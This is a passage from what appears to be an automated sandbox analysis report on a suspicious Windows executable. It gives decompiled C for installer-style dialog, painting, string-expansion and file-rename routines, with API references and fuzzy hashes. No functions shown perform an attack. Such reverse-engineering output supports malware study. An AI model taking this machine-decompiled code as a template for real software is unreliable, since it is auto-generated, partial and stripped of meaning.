						EndDialog(_t126,  *0x429c88);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ec18, 0x40f, 0, 1);
						__eflags =  *0x42ec0c - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a898, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a898,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E00404338(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ec18, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4ec - _t134;
										if( *0x42f4ec == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c88 = 1;
											L21:
											_push(0x78);
											L22:
											E004042AA();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c88 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ec18);
						 *0x42ec18 = _a12;
						L58:
						if( *0x42b8b8 == _t134) {
							_t143 =  *0x42ec18 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b8b8 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403e06
0x00403e0f
0x00403f50
0x00403f54
0x00403f58
0x00403f5a
0x00403f5f
0x00403f6a
0x00403f75
0x00403f7a
0x00403f7c
0x00403f7e
0x00403f81
0x00403f86
0x00403f94
0x00403fa1
0x00403fa8
0x00403fa8
0x00403fa9
0x00403fa9
0x00403fae
0x00403fb4
0x00403fbb
0x00403fc1
0x00403fc3
0x00404003
0x00404008
0x0040400d
0x0040400d
0x00404012
0x0040401b
0x0040401d
0x00404022
0x00404028
0x0040402c
0x0040402c
0x00404031
0x00404037
0x00000000
0x00000000
0x00404042
0x00404048
0x00000000
0x00000000
0x00404051
0x00404059
0x0040405e
0x00404061
0x00404067
0x0040406c
0x0040406f
0x00404075
0x0040407a
0x0040407d
0x00404083
0x0040408b
0x00404091
0x00404097
0x0040409b
0x004040a2
0x004040a2
0x004040a2
0x004040ac
0x004040be
0x004040ca
0x004040cf
0x004040d9
0x004040df
0x004040e1
0x004040e6
0x004040e3
0x004040e3
0x004040e3
0x004040f6
0x0040410e
0x00404110
0x00404116
0x0040412b
0x00404118
0x00404121
0x00404123
0x00404123
0x00404131
0x00404142
0x00404153
0x0040415a
0x00404160
0x00404164
0x00404169
0x0040416b
0x00000000
0x00404171
0x00404171
0x00404173
0x00000000
0x00000000
0x00404179
0x0040417d
0x004041a2
0x004041a8
0x004041ae
0x004041b0
0x00000000
0x00000000
0x004041d6
0x004041dc
0x004041de
0x004041e3
0x00000000
0x00000000
0x004041e9
0x004041ec
0x004041ef
0x00404206
0x00404212
0x0040422b
0x00404231
0x00404235
0x0040423a
0x00404240
0x00000000
0x00000000
0x0040424a
0x00404255
0x00000000
0x00404255
0x0040417f
0x00404185
0x00000000
0x00000000
0x0040418b
0x00404191
0x00000000
0x00000000
0x00000000
0x00404197
0x0040416b
0x00404262
0x0040426e
0x00404275
0x00000000
0x00403fc5
0x00403fc5
0x00403fc8
0x00403ffb
0x00403ffb
0x00403ffd
0x00000000
0x00000000
0x00000000
0x00403ffd
0x00403fca
0x00403fce
0x00403fd3
0x00403fd5
0x00000000
0x00000000
0x00403fe5
0x00403fed
0x00000000
0x00403ff3
0x00403e21
0x00403e21
0x00403e25
0x00403e2a
0x00403e39
0x00403e39
0x00403e42
0x00403e4b
0x00403e56
0x00403e56
0x00403e62
0x00403e7e
0x00403e81
0x00403e94
0x00403e9a
0x00403f3d
0x00000000
0x00403f46
0x00403ea0
0x00403ead
0x00403eaf
0x00403eb1
0x00403ed0
0x00403ed0
0x00403ed3
0x00403ed8
0x00403edb
0x00403eeb
0x00403eec
0x00403eee
0x00403f24
0x00403f37
0x00000000
0x00403f37
0x00403ef0
0x00403ef6
0x00403f0f
0x00403f14
0x00403f16
0x00000000
0x00000000
0x00403f18
0x00403f04
0x00403f04
0x00403f06
0x00403f06
0x00000000
0x00403f06
0x00403ef9
0x00403efe
0x00000000
0x00403efe
0x00403edd
0x00403ee3
0x00000000
0x00000000
0x00403ee5
0x00000000
0x00403ee5
0x00403ed5
0x00000000
0x00403ed5
0x00403ebb
0x00403ec2
0x00403ec8
0x00403eca
0x00000000
0x00000000
0x00000000
0x00403eca
0x00403e86
0x00000000
0x00403e64
0x00403e6a
0x00403e74
0x0040427b
0x00404281
0x00404283
0x00404289
0x0040428e
0x00404294
0x00404294
0x00404289
0x0040429e
0x00000000
0x0040429e
0x00403e62

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E39
ShowWindow.USER32(?), ref: 00403E56
DestroyWindow.USER32 ref: 00403E6A
SetWindowLongA.USER32 ref: 00403E86
GetDlgItem.USER32 ref: 00403EA7
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBB
IsWindowEnabled.USER32(00000000), ref: 00403EC2
GetDlgItem.USER32 ref: 00403F70
GetDlgItem.USER32 ref: 00403F7A
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403F94
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403FE5
GetDlgItem.USER32 ref: 0040408B
ShowWindow.USER32(00000000,?), ref: 004040AC
EnableWindow.USER32(?,?), ref: 004040BE
EnableWindow.USER32(?,?), ref: 004040D9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040EF
EnableMenuItem.USER32 ref: 004040F6
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040410E
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00404121
lstrlenA.KERNEL32(0042A8B8,?,0042A8B8,00000000), ref: 0040414B
SetWindowTextA.USER32(?,0042A8B8), ref: 0040415A
ShowWindow.USER32(?,0000000A), ref: 0040428E

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
Instruction ID: d5b7a152eccfdaa35e4c53a1a76e60acfbe2d5449824965e5503988bb7e30882
Opcode Fuzzy Hash: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
Instruction Fuzzy Hash: 34C1E671604204ABDB216F62EE85E2B3BB8FB85349F40053EF641B51F0CB795892DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040443C, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040443C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x429884 =  *0x429884 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404338(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3e0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								_t40 =  &_v8; // 0x42e3e0
								E004046E0(_a4,  *_t40);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f448, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f448, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x429884 != 0) {
						goto L25;
					} else {
						_t112 =  *0x42a090 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004042F3(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004046BC();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42ec1c; // 0x82c3c2
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f498;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00404407;
				E004042D1(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E004042D1(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004042F3( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00404306(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42f454 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x429884 = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x429884 = 0;
				return 0;
			}

0x0040444c
0x00404571
0x004045cd
0x004045d1
0x0040469e
0x004046a0
0x004046a0
0x004046a6
0x004046a6
0x004046a9
0x00000000
0x004046b0
0x004045df
0x004045e1
0x004045eb
0x004045f6
0x004045f9
0x004045fc
0x00404607
0x0040460a
0x00404611
0x0040461f
0x00404637
0x00404639
0x0040463b
0x00404641
0x00404650
0x00404652
0x00404652
0x00404611
0x0040465c
0x00000000
0x00404667
0x0040466b
0x0040467c
0x0040467c
0x00404682
0x00404690
0x00404690
0x00000000
0x00404694
0x0040465c
0x0040457c
0x00000000
0x00404590
0x00404596
0x0040459c
0x00000000
0x00000000
0x004045c1
0x004045c3
0x004045c8
0x00000000
0x004045c8
0x0040457c
0x00404452
0x00404455
0x0040445a
0x0040445c
0x0040446b
0x0040446b
0x00404472
0x00404475
0x00404477
0x0040447c
0x00404485
0x0040448b
0x00404497
0x0040449a
0x004044a3
0x004044a8
0x004044ab
0x004044b0
0x004044c7
0x004044ce
0x004044e1
0x004044e4
0x004044f9
0x00404500
0x00404505
0x0040450a
0x0040450a
0x00404519
0x00404528
0x0040453a
0x0040453f
0x0040454f
0x00404551
0x00000000

APIs

CheckDlgButton.USER32 ref: 004044C7
GetDlgItem.USER32 ref: 004044DB
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004044F9
GetSysColor.USER32(?), ref: 0040450A
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404519
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404528
lstrlenA.KERNEL32(?), ref: 0040452B
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040453A
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040454F
GetDlgItem.USER32 ref: 004045B1
SendMessageA.USER32(00000000), ref: 004045B4
GetDlgItem.USER32 ref: 004045DF
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040461F
LoadCursorA.USER32 ref: 0040462E
SetCursor.USER32(00000000), ref: 00404637
LoadCursorA.USER32 ref: 0040464D
SetCursor.USER32(00000000), ref: 00404650
SendMessageA.USER32(00000111,00000001,00000000), ref: 0040467C
SendMessageA.USER32(00000010,00000000,00000000), ref: 00404690

Strings

B, xrefs: 0040463B
N, xrefs: 004045CD

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N$B
API String ID: 3103080414-4074832742
Opcode ID: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
Instruction ID: c8b3317feb23aa92da8c88ca1c3cf39d399e1714613d550ff25a6b2d3c0ef38e
Opcode Fuzzy Hash: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
Instruction Fuzzy Hash: 3761A1B1A40209BFDB109F61CD45F6A3BA9FB84744F00443AFB05BA1D1D7BDA9618F98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f454;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Setup Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f448;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Setup Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Setup Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Setup Setup
API String ID: 941294808-1602013819
Opcode ID: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
Instruction ID: 0ac27d016dd37b64d299d3f81b39716040336c4aee851974846d4d7042c5b915
Opcode Fuzzy Hash: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
Instruction Fuzzy Hash: CA419C71800249AFCF058FA5DE459AF7FB9FF44314F00802AF991AA1A0C778EA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405EBC, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EBC(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c648 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca48, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c248, "%s=%s\r\n", 0x42c648, 0x42ca48);
						_t53 = _t52 + 0x10;
						E004062E0(_t37, 0x400, 0x42ca48, 0x42ca48,  *((intOrPtr*)( *0x42f454 + 0x128)));
						_t12 = E00405DE6(0x42ca48, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E5E(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D4B(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D4B(_t38, _t21 + 0xa, 0x40a3f0);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405DA1(_t24 + _t46, 0x42c248, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E8D(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DE6(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c648, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405ebc
0x00405ec5
0x00405ecc
0x00405ee0
0x00405f08
0x00405f13
0x00405f17
0x00405f37
0x00405f3e
0x00405f48
0x00405f55
0x00405f5a
0x00405f5f
0x00405f63
0x00405f72
0x00405f74
0x00405f81
0x00405f85
0x00406020
0x00000000
0x00405f9b
0x00405fa8
0x00405fcc
0x00405fd0
0x00405fef
0x00405ff3
0x00405ff3
0x00405ff5
0x00405ffe
0x00406009
0x00406014
0x0040601a
0x00000000
0x0040601a
0x00405fd2
0x00405fd5
0x00405fe0
0x00405fdc
0x00405fde
0x00405fdf
0x00405fdf
0x00405fe7
0x00405fe9
0x00000000
0x00405fe9
0x00405fb3
0x00405fb9
0x00000000
0x00405fb9
0x00405f85
0x00405f63
0x00405ee2
0x00405eed
0x00405ef6
0x00405efa
0x00000000
0x00000000
0x00405efa
0x0040602b

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,0040604D,?,?), ref: 00405EED
GetShortPathNameA.KERNEL32 ref: 00405EF6

Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D

GetShortPathNameA.KERNEL32 ref: 00405F13
wsprintfA.USER32 ref: 00405F31
GetFileSize.KERNEL32(00000000,00000000,0042CA48,C0000000,00000004,0042CA48,?,?,?,?,?), ref: 00405F6C
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7B
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB3
SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,0042C248,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00406009
GlobalFree.KERNEL32 ref: 0040601A
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406021

Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\lpdKSOB78u.exe,80000000,00000003), ref: 00405DEA
Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C

Strings

[Rename], xrefs: 00405F9B, 00405FAD
%s=%s, xrefs: 00405F27

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: eb1cb4180cb4c9ea78b19c93ed4765593701f1c4a8a9694117d5f32cc93988d7
Instruction ID: 93867bad2f833244898b90dcbcfca195f0b3b673d55ab92eabf696d68ffba162
Opcode Fuzzy Hash: eb1cb4180cb4c9ea78b19c93ed4765593701f1c4a8a9694117d5f32cc93988d7
Instruction Fuzzy Hash: 29310371640B16ABC2306B659D48F6B3A5CDF45758F14003BF942F62C2EA7CE8118AAD

Uniqueness

Uniqueness Score: -1.00%

Function 004062E0, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004062E0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ec1c; // 0x82c3c2
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f498;
				_t39 = 0x42e3e0;
				_t90 = 0x42e3e0;
				if(_a4 >= 0x42e3e0 && _a4 - 0x42e3e0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E004062E0(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3e0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E0040624D(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E004061AB(_t90,  *0x42f448);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E00406528(_t90);
						}
						goto L42;
					}
